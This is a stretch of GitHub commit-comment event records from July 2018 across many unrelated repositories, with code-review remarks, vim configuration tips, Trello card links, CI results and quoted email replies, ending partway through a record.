{"id":"7928863361","type":"CommitCommentEvent","actor":{"login":"dpalazz"},"repo":{"name":"Smith2106/Chatagonia"},"payload":{"comment":{"id":29621315,"position":null,"line":null,"path":null,"commit_id":"b440ef5ea342df770d076ac654850b911fc12283","created_at":"2018-07-06T13:15:51Z","updated_at":"2018-07-06T13:15:51Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-06T13:15:51Z"}
{"id":"7928865378","type":"CommitCommentEvent","actor":{"login":"lucas2213690"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29621320,"position":null,"line":null,"path":null,"commit_id":"b8acaf36895250374f939a8fc85b701aec42543c","created_at":"2018-07-06T13:16:14Z","updated_at":"2018-07-06T13:16:14Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implementar a efetuação uma Compra e todas suas dependências](https://trello.com/c/lbATkDET/188-implementar-a-efetua%C3%A7%C3%A3o-uma-compra-e-todas-suas-depend%C3%AAncias)"}},"created_at":"2018-07-06T13:16:14Z"}
{"id":"7928866991","type":"CommitCommentEvent","actor":{"login":"lucas2213690"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29621321,"position":null,"line":null,"path":null,"commit_id":"61edea5433066700ea30709fc36356e29207a1d4","created_at":"2018-07-06T13:16:33Z","updated_at":"2018-07-06T13:16:33Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implementar a efetuação uma Compra e todas suas dependências](https://trello.com/c/lbATkDET/188-implementar-a-efetua%C3%A7%C3%A3o-uma-compra-e-todas-suas-depend%C3%AAncias)"}},"created_at":"2018-07-06T13:16:33Z"}
{"id":"7928867598","type":"CommitCommentEvent","actor":{"login":"premaca"},"repo":{"name":"ValidusOs/vendor_validus"},"payload":{"comment":{"id":29621323,"position":null,"line":null,"path":null,"commit_id":"bdb798ac9e58cacbfffc7832ebc0be436e64a4c3","created_at":"2018-07-06T13:16:41Z","updated_at":"2018-07-06T13:16:41Z","author_association":"NONE","body":"😆😎"}},"created_at":"2018-07-06T13:16:41Z"}
{"id":"7928869443","type":"CommitCommentEvent","actor":{"login":"lucas2213690"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29621326,"position":null,"line":null,"path":null,"commit_id":"5085009bb7f33875a1e135a0bbbaedc7ea41f467","created_at":"2018-07-06T13:17:03Z","updated_at":"2018-07-06T13:17:03Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implementar a efetuação uma Compra e todas suas dependências](https://trello.com/c/lbATkDET/188-implementar-a-efetua%C3%A7%C3%A3o-uma-compra-e-todas-suas-depend%C3%AAncias)"}},"created_at":"2018-07-06T13:17:03Z"}
{"id":"7928871215","type":"CommitCommentEvent","actor":{"login":"lucas2213690"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29621331,"position":null,"line":null,"path":null,"commit_id":"97328ff87823b76890663232d82c2597fa6d8094","created_at":"2018-07-06T13:17:24Z","updated_at":"2018-07-06T13:17:24Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implementar a efetuação uma Compra e todas suas dependências](https://trello.com/c/lbATkDET/188-implementar-a-efetua%C3%A7%C3%A3o-uma-compra-e-todas-suas-depend%C3%AAncias)"}},"created_at":"2018-07-06T13:17:24Z"}
{"id":"7928873139","type":"CommitCommentEvent","actor":{"login":"lucas2213690"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29621334,"position":null,"line":null,"path":null,"commit_id":"e3ba800b2bf20caebee842a96212cf2341994418","created_at":"2018-07-06T13:17:48Z","updated_at":"2018-07-06T13:17:48Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implementar a efetuação uma Compra e todas suas dependências](https://trello.com/c/lbATkDET/188-implementar-a-efetua%C3%A7%C3%A3o-uma-compra-e-todas-suas-depend%C3%AAncias)"}},"created_at":"2018-07-06T13:17:48Z"}
{"id":"7928875815","type":"CommitCommentEvent","actor":{"login":"kutsan"},"repo":{"name":"huyvohcmc/dotfiles"},"payload":{"comment":{"id":29621339,"position":28,"line":28,"path":"init.vim","commit_id":"cea110a9d598131c85d7a78a9efbcb048ffe1b6a","created_at":"2018-07-06T13:18:20Z","updated_at":"2018-07-06T13:18:20Z","author_association":"NONE","body":"If you are about to switch, don't forget to set VSC list manually as only git in it.\r\n\r\n```vim\r\nlet g:signify_vcs_list = ['git']\r\n```\r\n\r\nAnd, if you don't want to see added, deleted, modified counts, you can disable:\r\n\r\n```vim\r\nlet g:signify_sign_show_count = v:false\r\n```"}},"created_at":"2018-07-06T13:18:20Z"}
{"id":"7928878093","type":"CommitCommentEvent","actor":{"login":"yunchaosuper"},"repo":{"name":"dmcguojia/zplatform-trade"},"payload":{"comment":{"id":29621347,"position":null,"line":null,"path":null,"commit_id":"4aa6fdad45bd776ab45cc3c73dddf009fd3f1c6f","created_at":"2018-07-06T13:18:48Z","updated_at":"2018-07-06T13:18:48Z","author_association":"NONE","body":"学习了"}},"created_at":"2018-07-06T13:18:48Z"}
{"id":"7928881866","type":"CommitCommentEvent","actor":{"login":"ahtelel"},"repo":{"name":"EerieCode/Percy-Alpha-Testing"},"payload":{"comment":{"id":29621360,"position":4,"line":3,"path":"SOFU-JP/c101006061.lua","commit_id":"59977a0fc90afe79a122970c65d489f4364085d7","created_at":"2018-07-06T13:19:33Z","updated_at":"2018-07-06T13:19:33Z","author_association":"COLLABORATOR","body":"Truer words never spoken\r\n"}},"created_at":"2018-07-06T13:19:33Z"}
{"id":"7928883342","type":"CommitCommentEvent","actor":{"login":"lucas2213690"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29621364,"position":null,"line":null,"path":null,"commit_id":"69ab2c837ae017dafa8aed48a566cd70fbd30151","created_at":"2018-07-06T13:19:50Z","updated_at":"2018-07-06T13:19:50Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implementar a efetuação uma Compra e todas suas dependências](https://trello.com/c/lbATkDET/188-implementar-a-efetua%C3%A7%C3%A3o-uma-compra-e-todas-suas-depend%C3%AAncias)"}},"created_at":"2018-07-06T13:19:50Z"}
{"id":"7928884142","type":"CommitCommentEvent","actor":{"login":"AndreOliveiraMendes"},"repo":{"name":"EerieCode/Percy-Alpha-Testing"},"payload":{"comment":{"id":29621365,"position":4,"line":3,"path":"SOFU-JP/c101006061.lua","commit_id":"59977a0fc90afe79a122970c65d489f4364085d7","created_at":"2018-07-06T13:19:59Z","updated_at":"2018-07-06T13:19:59Z","author_association":"COLLABORATOR","body":"illumantys theorys above\r\n"}},"created_at":"2018-07-06T13:19:59Z"}
{"id":"7928884883","type":"CommitCommentEvent","actor":{"login":"jordandukart"},"repo":{"name":"Islandora/tuque"},"payload":{"comment":{"id":29621367,"position":null,"line":null,"path":null,"commit_id":"da68355c6c5fca43a636b2e443c3ced6930752a0","created_at":"2018-07-06T13:20:09Z","updated_at":"2018-07-06T13:20:09Z","author_association":"MEMBER","body":"@DiegoPino super old commit but looking to chat RE: failing Tuque tests if you want to pop in IRC."}},"created_at":"2018-07-06T13:20:09Z"}
{"id":"7928885075","type":"CommitCommentEvent","actor":{"login":"kzc"},"repo":{"name":"fabiosantoscode/terser"},"payload":{"comment":{"id":29621368,"position":null,"line":null,"path":null,"commit_id":"b495a46f54cb7d4c23efacb175e019e80825f08d","created_at":"2018-07-06T13:20:11Z","updated_at":"2018-07-06T13:20:11Z","author_association":"COLLABORATOR","body":"My mistake - I missed your commit comment \"(code style changes to tests)\" above. Thanks."}},"created_at":"2018-07-06T13:20:11Z"}
{"id":"7928885172","type":"CommitCommentEvent","actor":{"login":"kennethwongk"},"repo":{"name":"kennethwongk/testrun"},"payload":{"comment":{"id":29621369,"position":null,"line":null,"path":null,"commit_id":"b9568488738074bec8362dbd09cc4cb61d8aa3c3","created_at":"2018-07-06T13:20:12Z","updated_at":"2018-07-06T13:20:12Z","author_association":"OWNER","body":"can you change it to Mars?"}},"created_at":"2018-07-06T13:20:12Z"}
{"id":"7928885349","type":"CommitCommentEvent","actor":{"login":"Raiv1"},"repo":{"name":"Raiv1/Raivgithub."},"payload":{"comment":{"id":29621370,"position":null,"line":null,"path":null,"commit_id":"0c01b6dc1c07054eb2e879f7d89a777058e15fbd","created_at":"2018-07-06T13:20:13Z","updated_at":"2018-07-06T13:20:13Z","author_association":"OWNER","body":"This is a simple form ...for user"}},"created_at":"2018-07-06T13:20:13Z"}
{"id":"7928885648","type":"CommitCommentEvent","actor":{"login":"lucas2213690"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29621372,"position":null,"line":null,"path":null,"commit_id":"1b6f93c3636dd683cd774fc75d51d30463d99409","created_at":"2018-07-06T13:20:16Z","updated_at":"2018-07-06T13:20:16Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implementar a efetuação uma Compra e todas suas dependências](https://trello.com/c/lbATkDET/188-implementar-a-efetua%C3%A7%C3%A3o-uma-compra-e-todas-suas-depend%C3%AAncias)"}},"created_at":"2018-07-06T13:20:16Z"}
{"id":"7928887448","type":"CommitCommentEvent","actor":{"login":"ahtelel"},"repo":{"name":"EerieCode/Percy-Alpha-Testing"},"payload":{"comment":{"id":29621376,"position":4,"line":3,"path":"SOFU-JP/c101006061.lua","commit_id":"59977a0fc90afe79a122970c65d489f4364085d7","created_at":"2018-07-06T13:20:37Z","updated_at":"2018-07-06T13:20:37Z","author_association":"COLLABORATOR","body":"no"}},"created_at":"2018-07-06T13:20:37Z"}
{"id":"7928887570","type":"CommitCommentEvent","actor":{"login":"vrlink"},"repo":{"name":"EOSVR/EOSVR"},"payload":{"comment":{"id":29621377,"position":null,"line":null,"path":null,"commit_id":"b624c8aeb4b8b866d73452c7358c0ddbc99ac34a","created_at":"2018-07-06T13:20:38Z","updated_at":"2018-07-06T13:20:38Z","author_association":"NONE","body":"看起来是个bug，即发送的代币数目会与当前的eos数量进行比较，如果大于eos数就会报错。\r\n因为之前只做了eos发送的支持，其他代币是后加的，会在下个版本修复。\r\n多谢\r\n"}},"created_at":"2018-07-06T13:20:38Z"}
{"id":"7928887593","type":"CommitCommentEvent","actor":{"login":"lucas2213690"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29621378,"position":null,"line":null,"path":null,"commit_id":"523a87359f21a8f1bbbb9089771d7d89d1bb0be7","created_at":"2018-07-06T13:20:39Z","updated_at":"2018-07-06T13:20:39Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implementar a efetuação uma Compra e todas suas dependências](https://trello.com/c/lbATkDET/188-implementar-a-efetua%C3%A7%C3%A3o-uma-compra-e-todas-suas-depend%C3%AAncias)"}},"created_at":"2018-07-06T13:20:39Z"}
{"id":"7928890736","type":"CommitCommentEvent","actor":{"login":"samm82"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29621388,"position":null,"line":null,"path":null,"commit_id":"819fc522f706d8a6b6f7eadafbcf5294b0dd7f0e","created_at":"2018-07-06T13:21:16Z","updated_at":"2018-07-06T13:21:16Z","author_association":"COLLABORATOR","body":"Did you bump the version number of drasil-lang?"}},"created_at":"2018-07-06T13:21:16Z"}
{"id":"7928890978","type":"CommitCommentEvent","actor":{"login":"JustOff"},"repo":{"name":"MoonchildProductions/UXP"},"payload":{"comment":{"id":29621391,"position":null,"line":null,"path":null,"commit_id":"39c7be96de7deb2a6929d6b61013e8ad177ea8ba","created_at":"2018-07-06T13:21:19Z","updated_at":"2018-07-06T13:21:19Z","author_association":"CONTRIBUTOR","body":"Pushed to CrowdIn."}},"created_at":"2018-07-06T13:21:19Z"}
{"id":"7928893111","type":"CommitCommentEvent","actor":{"login":"ravernkoh"},"repo":{"name":"heroku/x"},"payload":{"comment":{"id":29621403,"position":null,"line":null,"path":null,"commit_id":"9203a5f7bb9fa035119d7ad5243a7ce5ec0c49cd","created_at":"2018-07-06T13:21:46Z","updated_at":"2018-07-06T13:21:46Z","author_association":"NONE","body":"Your commit message really funny 🤣 "}},"created_at":"2018-07-06T13:21:46Z"}
{"id":"7928894460","type":"CommitCommentEvent","actor":{"login":"ajrhacker"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29621407,"position":null,"line":null,"path":null,"commit_id":"ab0f99373d41efc7b74df1e66fcbe70d8c6f025c","created_at":"2018-07-06T13:22:02Z","updated_at":"2018-07-06T13:22:02Z","author_association":"CONTRIBUTOR","body":"You've been changing behavior here and in previous commits. `NOOP` (formerly `NULL`) isn't necessarily the same as `CONSTANT(0)`; it's supposed to be the equivalent of not configuring the callback at all. That usually translates to a default value provided by resolve_safe, which may well be 0xff or something else nonzero."}},"created_at":"2018-07-06T13:22:02Z"}
{"id":"7928899600","type":"CommitCommentEvent","actor":{"login":"NamelessCoder"},"repo":{"name":"clickstorm/cs_seo"},"payload":{"comment":{"id":29621426,"position":null,"line":null,"path":null,"commit_id":"d89698a14178abdc794f9e1619b5cdff21a82ce6","created_at":"2018-07-06T13:23:05Z","updated_at":"2018-07-06T13:23:05Z","author_association":"NONE","body":"- NamelessCoder\\GizzleGitPlugins\\GizzlePlugins\\ClonePlugin:0000000047be09c0000000006571398e:\n  - 0: Executing Git clone command: /usr/bin/git clone --depth 1 --single-branch --branch '3.0.1' 'https://github.com/clickstorm/cs_seo.git' /tmp/d89698a14178abdc794f9e1619b5cdff21a82ce6/cs_seo\n  - NamelessCoder\\TYPO3RepositoryGizzle\\GizzlePlugins\\ExtensionRepositoryReleasePlugin:0000000047be09de000000006571398e:\n    - resultCode: 10504\n    - resultMessages:\n      - 0: Please note that it might take a while (up to an hour) until your extension and the documentation appear on TYPO3.org.\n      - version: 3.0.1"}},"created_at":"2018-07-06T13:23:05Z"}
{"id":"7928928165","type":"CommitCommentEvent","actor":{"login":"JFLarvoire"},"repo":{"name":"passionate-coder/Classic-Start"},"payload":{"comment":{"id":29621511,"position":null,"line":null,"path":null,"commit_id":"b34d0910283250ed0d20f4a6e2e8a6ac5f90ea55","created_at":"2018-07-06T13:28:41Z","updated_at":"2018-07-06T13:28:41Z","author_association":"NONE","body":"I too have used buddybu's build, and it fixes the problem on the latest _slow_ insider build #17692 too.\r\nThanks!"}},"created_at":"2018-07-06T13:28:41Z"}
{"id":"7928928354","type":"CommitCommentEvent","actor":{"login":"crossoverJie"},"repo":{"name":"crossoverJie/Java-Interview"},"payload":{"comment":{"id":29621512,"position":null,"line":null,"path":null,"commit_id":"c7fc93df8c85f1d6904853cffeddc0c65242ad3f","created_at":"2018-07-06T13:28:43Z","updated_at":"2018-07-06T13:28:43Z","author_association":"OWNER","body":"@luoxp183 啥意思？"}},"created_at":"2018-07-06T13:28:43Z"}
{"id":"7928929031","type":"CommitCommentEvent","actor":{"login":"MagicAndre1981"},"repo":{"name":"processhacker/processhacker"},"payload":{"comment":{"id":29621516,"position":null,"line":null,"path":null,"commit_id":"fd3eb0994640c51c3ecf68035950e129514a456e","created_at":"2018-07-06T13:28:51Z","updated_at":"2018-07-06T13:28:51Z","author_association":"NONE","body":"this is still not the best way. look in registry under **HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows Kits\\Installed Roots** for the **KitsRoot10** string. With VS2017 15.7 the setup can move shared data to other drives and here the SDK is moved, too.\r\n\r\n![grafik](https://user-images.githubusercontent.com/8274816/42381395-309cdbec-8131-11e8-8034-2fca8161facb.png)\r\n\r\nMy value is E:\\Windows Kits\\10\\. If Debugger is installed there is also a string **WindowsDebuggerRoot10** with the value to the debugger location."}},"created_at":"2018-07-06T13:28:51Z"}
{"id":"7928929658","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29621517,"position":41,"line":1240,"path":"sys/dev/xen/blkfront/blkfront.c","commit_id":"610047bc55551d8c4cf8272db14e8754a855dfe6","created_at":"2018-07-06T13:28:58Z","updated_at":"2018-07-06T13:28:58Z","author_association":"NONE","body":"Now that I think of this, shouldn't you use sc->xbd_max_request_indirectpages here instead of BLKIF_MAX_INDIRECT_PAGES_PER_REQUEST? BLKIF_MAX_INDIRECT_PAGES_PER_REQUEST is the maximum value supported by the protocol, but you should just allocate the maximum supported by the backend and the frontend (xbd_max_request_indirectpages)."}},"created_at":"2018-07-06T13:28:58Z"}
{"id":"7928930262","type":"CommitCommentEvent","actor":{"login":"Matthies"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29621521,"position":null,"line":null,"path":null,"commit_id":"e66a1a7c0c9f5a44857ab41afea935cb79a196f2","created_at":"2018-07-06T13:29:06Z","updated_at":"2018-07-06T13:29:06Z","author_association":"NONE","body":"Can anybody explain where this \"d > 17 : 0\" comes from? I would have expected maybe some constant bonus but at least steady with depth 16. Or is it just \"passed the test so it must be good\"?"}},"created_at":"2018-07-06T13:29:06Z"}
{"id":"7928931465","type":"CommitCommentEvent","actor":{"login":"kutsan"},"repo":{"name":"huyvohcmc/dotfiles"},"payload":{"comment":{"id":29621524,"position":28,"line":28,"path":"init.vim","commit_id":"cea110a9d598131c85d7a78a9efbcb048ffe1b6a","created_at":"2018-07-06T13:29:20Z","updated_at":"2018-07-06T13:29:20Z","author_association":"NONE","body":"Hah, I knew it. Your colorscheme doesn't support signify yet but you can use these lines to make it work:\r\n\r\n```vim\r\nhighlight! link SignifySignAdd GitGutterAdd\r\nhighlight! link SignifySignChange GitGutterChange\r\nhighlight! link SignifySignChangeDelete GitGutterChangeDelete\r\nhighlight! link SignifySignDelete GitGutterDelete\r\nhighlight! link SignifySignDeleteFirstLine SignifySignDelete\r\n```\r\n\r\nSee https://github.com/jacoborus/tender.vim/issues/35, I created issue _just_ for you."}},"created_at":"2018-07-06T13:29:20Z"}
{"id":"7928932621","type":"CommitCommentEvent","actor":{"login":"edglas1"},"repo":{"name":"Microsoft/vsts-tasks"},"payload":{"comment":{"id":29621526,"position":31,"line":109,"path":"Tasks/DotNetCoreInstallerV0/dotnetcoreinstaller.ts","commit_id":"fcf01cf6e98e630af846e3a377133b6be2a8f067","created_at":"2018-07-06T13:29:31Z","updated_at":"2018-07-06T13:29:31Z","author_association":"NONE","body":"This needs to work on Mac and Linux too, right?"}},"created_at":"2018-07-06T13:29:31Z"}
{"id":"7928932683","type":"CommitCommentEvent","actor":{"login":"jiru"},"repo":{"name":"Tatoeba/tatoeba2"},"payload":{"comment":{"id":29621527,"position":7,"line":179,"path":"app/Test/Fixture/SentenceFixture.php","commit_id":"37569043257a4424aa877b3bba32a7b7fcf3aced","created_at":"2018-07-06T13:29:32Z","updated_at":"2018-07-06T13:29:32Z","author_association":"MEMBER","body":"This fixture is likely to be used for other purposes than testing translation order in the future, so I think a text indicating what is the characteristic of that particular fixture would be more helpful (like \"This sentence has many translations\"). By the way, wasn’t it possible to write your test using the existing sentence 1 or 4 already? As long as you can make the test fail, it’s good enough."}},"created_at":"2018-07-06T13:29:32Z"}
{"id":"7928938334","type":"CommitCommentEvent","actor":{"login":"hhatto"},"repo":{"name":"woothee/woothee-rust"},"payload":{"comment":{"id":29621544,"position":null,"line":null,"path":null,"commit_id":"a3f71357062a0fa0748d0bdee598a424415b5a8e","created_at":"2018-07-06T13:30:35Z","updated_at":"2018-07-06T13:30:35Z","author_association":"MEMBER","body":"@RReverser \r\nHow about this change?\r\nhttps://github.com/woothee/woothee-rust/commit/0dbabea5859ea76a9b524a8f81a191844ac30ed2"}},"created_at":"2018-07-06T13:30:35Z"}
{"id":"7928939665","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29621547,"position":29,"line":1228,"path":"sys/dev/xen/blkfront/blkfront.c","commit_id":"610047bc55551d8c4cf8272db14e8754a855dfe6","created_at":"2018-07-06T13:30:51Z","updated_at":"2018-07-06T13:30:51Z","author_association":"NONE","body":"I don't see any loop here, but you should likely also set sc-> xbd_max_request_indirectpages = 0."}},"created_at":"2018-07-06T13:30:51Z"}
{"id":"7928942821","type":"CommitCommentEvent","actor":{"login":"jakebolewski"},"repo":{"name":"TileDB-Inc/TileDB"},"payload":{"comment":{"id":29621555,"position":18,"line":18,"path":"doc/source/tutorials/concurrency-consistency.rst","commit_id":"b1ae69ae47155097b56b657093a4eebf2769e62b","created_at":"2018-07-06T13:31:28Z","updated_at":"2018-07-06T13:31:28Z","author_association":"MEMBER","body":"remove \"out\" here "}},"created_at":"2018-07-06T13:31:28Z"}
{"id":"7928944907","type":"CommitCommentEvent","actor":{"login":"huyvohcmc"},"repo":{"name":"huyvohcmc/dotfiles"},"payload":{"comment":{"id":29621560,"position":28,"line":28,"path":"init.vim","commit_id":"cea110a9d598131c85d7a78a9efbcb048ffe1b6a","created_at":"2018-07-06T13:31:53Z","updated_at":"2018-07-06T13:31:53Z","author_association":"OWNER","body":"Wow, thanks a lot mate."}},"created_at":"2018-07-06T13:31:53Z"}
{"id":"7928946371","type":"CommitCommentEvent","actor":{"login":"Zeboch"},"repo":{"name":"longkt90/prerender_rails"},"payload":{"comment":{"id":29621565,"position":null,"line":null,"path":null,"commit_id":"62dbb86cb0e86fb541b6dba2a27ea978c3b9c283","created_at":"2018-07-06T13:32:10Z","updated_at":"2018-07-06T13:32:10Z","author_association":"NONE","body":"Was your fix sufficient for Googlebot indexing issues ?"}},"created_at":"2018-07-06T13:32:10Z"}
{"id":"7928946800","type":"CommitCommentEvent","actor":{"login":"Zeboch"},"repo":{"name":"Context-Travel/prerender_rails"},"payload":{"comment":{"id":29621566,"position":null,"line":null,"path":null,"commit_id":"c14a89464d22b10d1dc1791beff824073bcb1226","created_at":"2018-07-06T13:32:14Z","updated_at":"2018-07-06T13:32:14Z","author_association":"NONE","body":"Was your fix sufficient for Googlebot indexing issues ?"}},"created_at":"2018-07-06T13:32:14Z"}
{"id":"7928947903","type":"CommitCommentEvent","actor":{"login":"Zeboch"},"repo":{"name":"mtoribio/prerender_rails"},"payload":{"comment":{"id":29621570,"position":null,"line":null,"path":null,"commit_id":"16fc46ff4769bbe0a7a743d83777e2afd57f58cb","created_at":"2018-07-06T13:32:27Z","updated_at":"2018-07-06T13:32:27Z","author_association":"NONE","body":"Was your fix sufficient for Googlebot indexing issues ?"}},"created_at":"2018-07-06T13:32:27Z"}
{"id":"7928948076","type":"CommitCommentEvent","actor":{"login":"l3pp4rd"},"repo":{"name":"Atlantic18/DoctrineExtensions"},"payload":{"comment":{"id":29621571,"position":14,"line":128,"path":"lib/Gedmo/Tree/Strategy/ORM/Nested.php","commit_id":"3ec08de71802943e13f04fd5735e30e4191f5b03","created_at":"2018-07-06T13:32:29Z","updated_at":"2018-07-06T13:32:29Z","author_association":"MEMBER","body":"Hi, can you submit PR with an isset check instead?"}},"created_at":"2018-07-06T13:32:29Z"}
{"id":"7928950124","type":"CommitCommentEvent","actor":{"login":"jakebolewski"},"repo":{"name":"TileDB-Inc/TileDB"},"payload":{"comment":{"id":29621578,"position":28,"line":28,"path":"doc/source/tutorials/concurrency-consistency.rst","commit_id":"b1ae69ae47155097b56b657093a4eebf2769e62b","created_at":"2018-07-06T13:32:53Z","updated_at":"2018-07-06T13:32:53Z","author_association":"MEMBER","body":"I would remove all this performance copy (parallelism, etc.), or just say that is cheap to define / create an array."}},"created_at":"2018-07-06T13:32:53Z"}
{"id":"7928951723","type":"CommitCommentEvent","actor":{"login":"kutsan"},"repo":{"name":"huyvohcmc/dotfiles"},"payload":{"comment":{"id":29621585,"position":28,"line":28,"path":"init.vim","commit_id":"cea110a9d598131c85d7a78a9efbcb048ffe1b6a","created_at":"2018-07-06T13:33:13Z","updated_at":"2018-07-06T13:33:13Z","author_association":"NONE","body":"I would have created a pull request there but I think that project isn't maintained anymore. You're welcome!"}},"created_at":"2018-07-06T13:33:13Z"}
{"id":"7928955564","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29621596,"position":41,"line":1240,"path":"sys/dev/xen/blkfront/blkfront.c","commit_id":"610047bc55551d8c4cf8272db14e8754a855dfe6","created_at":"2018-07-06T13:33:56Z","updated_at":"2018-07-06T13:33:56Z","author_association":"OWNER","body":"Yeah, you are correct. I'll fix it."}},"created_at":"2018-07-06T13:33:56Z"}
{"id":"7928958536","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29621604,"position":null,"line":null,"path":null,"commit_id":"6c7531ea10c5afa5ef04487def2c5772a1a5d480","created_at":"2018-07-06T13:34:32Z","updated_at":"2018-07-06T13:34:32Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - Win64-Windows-7-VisualStudio-14: OK (2933 of 2933 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6c7531ea10c5afa5ef04487def2c5772a1a5d480-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6c7531ea10c5afa5ef04487def2c5772a1a5d480-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-06T13:34:32Z"}
{"id":"7928962399","type":"CommitCommentEvent","actor":{"login":"SeynalKim"},"repo":{"name":"SeynalKim/JavaFXCalendar"},"payload":{"comment":{"id":29621619,"position":null,"line":null,"path":null,"commit_id":"44eacf200270302c57f05ffbe34fa107999d5309","created_at":"2018-07-06T13:35:16Z","updated_at":"2018-07-06T13:35:16Z","author_association":"OWNER","body":"Whole project in case someone want's to import the project in IntelliJ."}},"created_at":"2018-07-06T13:35:16Z"}
{"id":"7928962582","type":"CommitCommentEvent","actor":{"login":"ychadwick"},"repo":{"name":"Atlantic18/DoctrineExtensions"},"payload":{"comment":{"id":29621620,"position":14,"line":128,"path":"lib/Gedmo/Tree/Strategy/ORM/Nested.php","commit_id":"3ec08de71802943e13f04fd5735e30e4191f5b03","created_at":"2018-07-06T13:35:17Z","updated_at":"2018-07-06T13:35:17Z","author_association":"NONE","body":"As I say, it is in your WIP copy, just hasn’t been released.\n\n> On 6 Jul 2018, at 15:32, Gediminas Morkevicius <notifications@github.com> wrote:\n> \n> Hi, can you submit PR with an isset check instead?\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub <https://github.com/Atlantic18/DoctrineExtensions/commit/3ec08de71802943e13f04fd5735e30e4191f5b03#commitcomment-29621571>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AAojHfcWWC-Ald90RDFraR5R7rOxb0KBks5uD2bvgaJpZM4VFdIN>.\n> \n\n"}},"created_at":"2018-07-06T13:35:17Z"}
{"id":"7928962743","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29621621,"position":null,"line":null,"path":null,"commit_id":"58cc6a502a5d6500e6435497ba104491763bab0f","created_at":"2018-07-06T13:35:19Z","updated_at":"2018-07-06T13:35:19Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://752b6568.ngrok.io/ui#review:id=381)"}},"created_at":"2018-07-06T13:35:19Z"}
{"id":"7928962830","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29621622,"position":null,"line":null,"path":null,"commit_id":"58cc6a502a5d6500e6435497ba104491763bab0f","created_at":"2018-07-06T13:35:21Z","updated_at":"2018-07-06T13:35:21Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-06T13:35:21Z"}
{"id":"7928965045","type":"CommitCommentEvent","actor":{"login":"briantardif"},"repo":{"name":"briantardif/hello-world"},"payload":{"comment":{"id":29621626,"position":null,"line":null,"path":null,"commit_id":"4b31e8c4b4000735c2fcf4e0eff711e3ea338c44","created_at":"2018-07-06T13:35:46Z","updated_at":"2018-07-06T13:35:46Z","author_association":"OWNER","body":"This is the new commit"}},"created_at":"2018-07-06T13:35:46Z"}
{"id":"7928967135","type":"CommitCommentEvent","actor":{"login":"ychadwick"},"repo":{"name":"Atlantic18/DoctrineExtensions"},"payload":{"comment":{"id":29621633,"position":14,"line":128,"path":"lib/Gedmo/Tree/Strategy/ORM/Nested.php","commit_id":"3ec08de71802943e13f04fd5735e30e4191f5b03","created_at":"2018-07-06T13:36:10Z","updated_at":"2018-07-06T13:36:10Z","author_association":"NONE","body":"Sorry not WIP but v2.4.x branch.\n\nhttps://github.com/Atlantic18/DoctrineExtensions/blob/v2.4.x/lib/Gedmo/Tree/Strategy/ORM/Nested.php <https://github.com/Atlantic18/DoctrineExtensions/blob/v2.4.x/lib/Gedmo/Tree/Strategy/ORM/Nested.php>\n\n> On 6 Jul 2018, at 15:35, Yorkie Chadwick <yorkie@me.com> wrote:\n> \n> As I say, it is in your WIP copy, just hasn’t been released.\n> \n>> On 6 Jul 2018, at 15:32, Gediminas Morkevicius <notifications@github.com <mailto:notifications@github.com>> wrote:\n>> \n>> Hi, can you submit PR with an isset check instead?\n>> \n>> —\n>> You are receiving this because you commented.\n>> Reply to this email directly, view it on GitHub <https://github.com/Atlantic18/DoctrineExtensions/commit/3ec08de71802943e13f04fd5735e30e4191f5b03#commitcomment-29621571>, or mute the thread 